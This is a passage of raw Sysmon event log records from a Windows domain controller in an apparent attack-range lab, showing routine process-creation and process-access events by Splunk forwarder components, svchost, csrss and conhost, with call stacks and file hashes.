Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004410Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:48.595{59A5CD1D-8F2C-6005-F000-00000000A301}3452C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004409Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:48.155{59A5CD1D-8F2C-6005-EF00-00000000A301}7283776C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004408Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:48.015{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8F2C-6005-EF00-00000000A301}728C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004407Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:48.015{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004406Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:48.015{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004405Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:48.015{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004404Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:48.015{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004403Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:48.015{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004402Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:48.015{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004401Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:48.015{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004400Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:48.015{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004399Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:48.015{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004398Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:48.015{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8F2C-6005-EF00-00000000A301}728C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004397Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:48.015{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8F2C-6005-EF00-00000000A301}728C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004396Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:48.015{59A5CD1D-8F2C-6005-EF00-00000000A301}728C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004436Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:49.937{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8F2D-6005-F100-00000000A301}4904C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004435Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:49.937{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004434Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:49.937{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004433Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:49.937{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004432Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:49.937{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004431Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:49.937{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004430Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:49.937{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004429Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:49.937{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004428Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:49.937{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004427Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:49.937{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004426Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:49.937{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8F2D-6005-F100-00000000A301}4904C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004425Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:49.937{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8F2D-6005-F100-00000000A301}4904C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program 